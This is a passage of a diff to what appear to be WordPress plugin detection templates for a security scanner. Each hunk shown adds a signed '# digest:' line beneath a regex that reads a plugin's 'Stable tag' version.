+46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c5cd0aee0d0ad42173e5efb8bcb9404ff4f2bc6ee08376ed44554a283f39fd0e022100a815d633e41e4bcde4f58128414cb6a5e7e64f69edcc6b40a39a10dee9ca7489:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 45260ccfba..31041e3991 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210092a5a5b3a65d200cbaef3172dd567246fd693054723fdaa164edfda3e13a3420022100fd6d0af8ddea1d8b8355788ce2b4c3e86dc0a1b25e7d06799700add87b6c8f08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2131dbe751..bb38fa074d 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200215bff7e2dfaf0ca23d8ce30bba181b7b3e15615657381ead57d5abe45760ff022100b845aec40f2cb0539fa1854baf568437a0befe0f371e4482ad10bfb9dd8aebb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 73d644c5e4..3160138941 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200eb21eb71677b02888c973ab210cbde34705205a2122f6caa24f5137cab3008c022100d2dea8c52f211de2f8eec6e4e08b5b5670084e6829d28cbd24f925dd486fb041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 7b0593dcb7..471a2a3420 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d32c80d1bb55756ac9a2d5763b6cd2dad7ba7f27521b767fe9d9b47205a8d611022100cccf6fa2e1dddfe0d943f5d1fdfd9a5ddbf88fb5428bb9eb8387cf8bf086ec3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 6f65d087e4..653eb07637 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004dc8b2c191923e9d44268cf3c8b3689e839d4b075dd41229046c7d942469b8f02204cc2b00610d23d6d1ac91b1673a74bcaa21f3a34bd413bb12ad6ffa3e6f577a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 783cdd283d..7a69488010 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ee3788b509ff21b9b0a12cf5acfd70278ed056ec132330957cc9608fa2863a3402203e7f0cc571ae68a66855becb8d42fcbd57b95d7bec7c83c68890c2b7c1b4868e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 05121854b3..42607b81fe 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202cbf0b7784d15313ce5d5f9173e2e76c31ed4c138488cca9c48c2675c549d51b02206f2bd2a80ca10339f62f16e911e5d7278ee57ec12600ddef76eee919de23499f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 72f52edcd4..5874b7de07 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202d5a6028989e76b86e8f405107f784686c06f6ea5b0510285942ad0ef6068458022100e2c12b741672313c513dcf3913cbb65f79dfbe85b6d0bbfea0ded8850cec67d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 4cf45ebd74..6b90c6adcf 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205495d064328450f947e304882e24eb98d34b1e5b3237d968d715876e678aab6102203c7c25ae89debb59fdbcaed86e227e87722d79fbf948085b20a79fa84db955a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 3d6863e074..5be09a440c 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203362eaa84c19aa9effdb58be55d876d78e4d261d89939b64d3c770920c156db90220499b53032c658e9d65c2d9c14a45b364c24f8d78a4f63727619cf9808a7e9230:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 79e2813c5e..cf543e2f5b 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a822b8e885d31348620503a366c6827fc43bc2736149b488aaf5398ada891101022100cfa4b9c3970ebc686d4b4d5806c4c0714c1599247d7b581bbf1c0bcd12f0b8a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index ab9a0f1ae3..e8cd51e9b7 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100899646fb58ca55c8af1573c73311c5cbc5020016efe3482f2451d24bbe643c9902201b046fd8deb15bb2772d064c055f52944b1adc85d145f5bb3415f66b04abeeeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 5d3adf7c27..125c514436 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200603df7012a0c694d202df7193bf4e601887eb7da822edec2c3d42f355331e57022100f032752ad623260dea582c3625aa84d3d820e3e4a0f0ef8e935e79ec28f7d3a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index fea9594fa0..21675ac7d0 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022079e61d334f704133e6a213c0409f284951c534dad0b2297304351842e1fa634e02210087e043d171bb4e49da7073e885ba6c1f2cbd1faef25dc9ba09a27a2640fc7aa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 16dfc8df5f..9e0a2d2dc1 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210096b7e852669276b39f1208b5fb15624b2f3fa0e8d51c6346927e55fd39227494022100d679a1e7d25c245e79fe99790436b5ab89a4b528d4566021e3098d14c8e7e107:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 4b7600ea69..5ac7b893aa 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205047a1157073d472933296fc49207314ee572050ec791dd938af87e4dfca8232022100ce654a8ef8024fc46c749ae5b73b997726fa85c026cb5db4028fb61ef0d0ef5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index 2ccd4dbce8..cd9f0bd338 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d3a1f48d956ae2aaa39024dd6245e39be9d3b988440b442dccbe1fdee8fe5ecc022063076cfa9be5b35fd27b9cbc24926f445ad3d873d4b8b4939d914b9e9ba9291b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index 02ceb224d1..e29e261f6e 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100994d84c406d494d38dd5cd057bf210ac2ae4ae05b636e2d7d98b7ebd1cc335cc022100e1a5d4534c826821b07ff1a435d06615c0ffd9b7569dd801b57f5466dd221667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 367d587ce2..7afe144d9e 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220385c1811bcec6332300dd5df639f2843cedcb6d0508ec5760ce698c89f3abc0f02204c8d9a58a0961f17bac7b62ff3bc13d1a435c913ed8140d902754de661365051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index feed730ee0..d975042851 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d1081253d6776c448817050b6c41deae47288c6e4dc8f34c60325b31a0c6963e0221009fafe882a64f17a2381140294f4ac65b5f81f6aa889ac30091abe0c470e62782:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 9b2841e7ca..3e697f9431 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200a947f1ac5fd707778e27cb39a1e61e13a8075a65f8d648b5e8b55f0de5ad57702210092824f1d4f9e13cfc187a1d7d9ba735658df72aa19499696ab4fbdde91ce4250:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 42be14c5df..fe90b06ab2 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220307d9dc73b2604f75c1e453e4e9e2eabfd85bc63bb880b5fa1762dd4dea7c5de022100b5bbb8749dc94405fb46d2ba07a55696c5e9485dc4ed8a9ce1c84b3baaf1eb1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 4e0cd86c3f..291f63f23d 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d953daada5684cef06ffd819d1602e6ee476f2bad0bb0adcc6849d84865afc2c022000fd3b6d82b4bef65000ae8232ff1452a59d6d2c04970125aecda2158d6d573b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..8b9fc92729 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022057b1096098b14b4450f553467b3d9ec792d97e58731d9f27810ca0978dfa9d8a0220429ad9afc92a058d8fba49cb3e129666264d023c784b59e975e4f00164db265e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..3fd3339a92 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220110a0057d72abba78447ed768bda072efb31780d1f0a59074d1ca82a79c71d8702202cb1b8838b6cca1c90a9e24fa730f82b5ae4772bba7c01188b9d29d2526aa0dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..2dcf8c57dc 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bdf58649ab6d9fbce27e4eb914a5dfaae4f005f4d9ccd38c6dd342a1712f936f02203cca14a4e6b708a212a5af06df3aa0dbb7dfdd4c4205fc3a2c8d5101bc9ecbca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..b5adb7aec7 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022004a757f6c2f0f1bfab7ea91d4b1e5bd8022e4bbaec0f5155cc2ce1cf44826b53022100db2633b1ddd771a21ef90597213a6e7d1b91fe9eb0023d78a3ae93d96ea34726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..f5552cb020 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d794915171ea24e3e4bb0f70591cdd8026c16d873d0b7ce7b22077ddff4bd56a022100fcaf2c8bcd082964e2cb78f81113e6a2d15095abf7f5709b58c8eb98350181f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..71e4d8667c 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206f107ea871d0453868dfa520f0795b7fea1356df8384f46280fe55864c137b2a022044e6966b7eaf40e53770aa1b1c96815474478e24a9528e84935db1db3e546066:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..492dc3657a 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022048cf9a5d168fb9f888079eaff2139fc5121e8e9051f08b45ce91a2a50f6aa694022100c46377eae0fbb3603c7f7e619d335949fb33b8862813a4d77f3c37a8e459970f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..e48aaaf75a 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200b0a84d55aa771b7112d157cb3c025f350b5e9526c857405c1fc7cd830a6424402201739b113256e797b47230d44d4c3b0b69147759cb36eb0f1a4def5b587509c01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..68e83b40db 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201c1f9df57540a1c8aa282acebd76ef06518061a87180dc2b85f0b11669a9b32e022100c7f1a65d3d42830272cd6961d4669b5d7b8835a21f58e6931ad1116856d5cc7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..241b130bfe 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022025647f73e1f3dc64b9b845b17a00e71ffe624b89e0b752ba3764f16bf0b5b57c022100eedc0a2eafbff551a16b46b6c19c1ed48d0f7db7e164b2b71c8e96b77cbbd93a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..1efd2e346f 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e373449db06ecbc38d4995c4dc22aecea32e24a1990f9f0ff82744eca3c429b6022100b726937e91c3a9ba00a59af43e87c00c2b49f7e82c71375d7c198ca1005bc91e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..fc33bc109d 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022046d634aed143751a1111d8c937c2fff71d5de6108831bb48d485146f046f7a43022100ba9dc437e5b8ff864c39723bc16c455f601cd845753ff90ed6fc689cc18ce5c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..2c03590415 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220659fcc20c90f29e59dd495da1537ac59e0d3e4d4f4b9c9b4472987a554d9953102200717c531e5e4c8f67013cc513c69a3cf226ef82fdf58fd5a7cd619182fe3b38a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..6c893f0d3e 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022078c10743b04b9ec601c6abcf4ab4a78795986c9dc53e3b271df91f44f11dad1e022100e3d282a65e98d2c4c231d54a2367f76178d7fc2a57d7a8175462dca867492c46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..cdacaafb86 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220780078476cd9cf8da22bf0e9de1692612d5221edbc2b8bb1c8b4b3abe11f483e02204faadbaba724dcb374ab90578d3e1322881c3ea76d6c1fbbb37ac5cb439adccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..2baf610ab2 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022040f477f8f313f793a75c9c90b1723183e3018bb95ed2c1842084de68da60561c022100fee6f4653f1f84f78ac00fe4d5141b09efec5bc5b14dd8d6e1c1f211bab9196f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..c22f40ed64 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220684fd187b5d5e90fd3dcea7f665aa7d3322b000fb9b81750e0624d0f97a8b76a022100c4fd1f8859532865da0d68ad6fa5734fe53d1c98b2f235807851779b3ba20d12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..54c2a23329 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d52168bc605d8427a4102076c3b1ae69e4d05462c47e82886ef401b5c9b0fb830220114bf3f76472792e4e485c0d576e282058b3a29fc0e14e535b0ab6f51d3f355f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..8bb9cf744d 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e6d1d433e5e321b5bfec963f61151481b0c90ebab0575ee07d2509b68dcad9f902200308fcf738f34447e95440a1af03d5b3299ecb6562d6666692ef4392d05e2b25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..ffa21da9a8 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a1d5c4eb686828fba3d1603197531649cdf4f5f9aa88ecd054b82d3b47ce02060221009117dd06c1718ae7049da31de8b1cdf9b45a15a1fbe87d6424d4ae073226c2dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..3da2dab827 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022029ce7232f81e3b051dd5cad0b56c509d9ed9ed9960180766bae869559d87cc590221009c929042b12d165a7039e48bec5a51d0548e48312a53744be20288ce90ac5221:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..56e068a2e9 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d92f50d56eeaa97d015732f9bfd1ec66df32115183e832f6e8d0b256957a5f7002210090f2e4b6ff4aecd4d7c37aedd74cd9c7a054022f3be8a9cfdb426366fbf6bbeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..9edd924f42 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d81ce7d0497a1d294523f65eb5438c141f9d0f9df06093456e724eebc755d115022100c3bba64f7095c868a5614d4a2fbb1f0f5d5cc8227702db27659592953cefb901:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..f7c2240b6d 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 